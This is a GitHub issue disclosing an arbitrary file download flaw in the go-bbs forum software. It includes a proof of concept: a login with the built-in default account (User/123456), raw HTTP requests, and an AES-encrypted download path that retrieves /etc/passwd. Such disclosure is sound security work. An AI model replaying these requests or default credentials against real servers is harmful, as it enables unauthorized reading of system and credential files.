Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

go-bbs has an arbitrary file download vulnerability #10

Open
yuyan-sec opened this issue Feb 26, 2023 · 0 comments
Open

go-bbs has an arbitrary file download vulnerability #10

yuyan-sec opened this issue Feb 26, 2023 · 0 comments

Comments

@yuyan-sec
Copy link

Install

  1. Download: git clone https://github.com/gobbscom/go-bbs.git
  2. Create a directory: cd go-bbs && mkdir conf
  3. Copy the configuration file: cp app.conf.example conf/app.conf
  4. Modify the database configuration
  5. Execute ./go-bbs --install to install the database,
  6. Finally execute ./go-bbs to access the corresponding port

Vulnerability Description AND recurrence

View routing API routers/router.go line 196
1

Follow up the &home.SingleController{} Download method, this interface needs to be logged in, and a user will be added by default through the global search Customer

UserName: User
PassWord: 123456

2

Check out router.go, follow up &home.LoginController{}, pass username and password to login
3

POST /login.html HTTP/1.1
Host: 192.168.19.6:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

username=user&password=123456

Credentials obtained: beegosessionID=***

4

The incoming URL needs to be AesDecrypt
5

So you need to perform AesEncrypt on the downloaded path

6

GET /api/v1/download/1dClk+Blwbf5B9SEDK+l58R84WE7XKXawdq51GCypQo= HTTP/1.1
Host: 192.168.19.6:9090
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Cookie: beegosessionID=6bf662559825c07495e9e8a1e7380180
Connection: close


Use the credentials to access the downloaded API and successfully download /etc/passwd

7

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant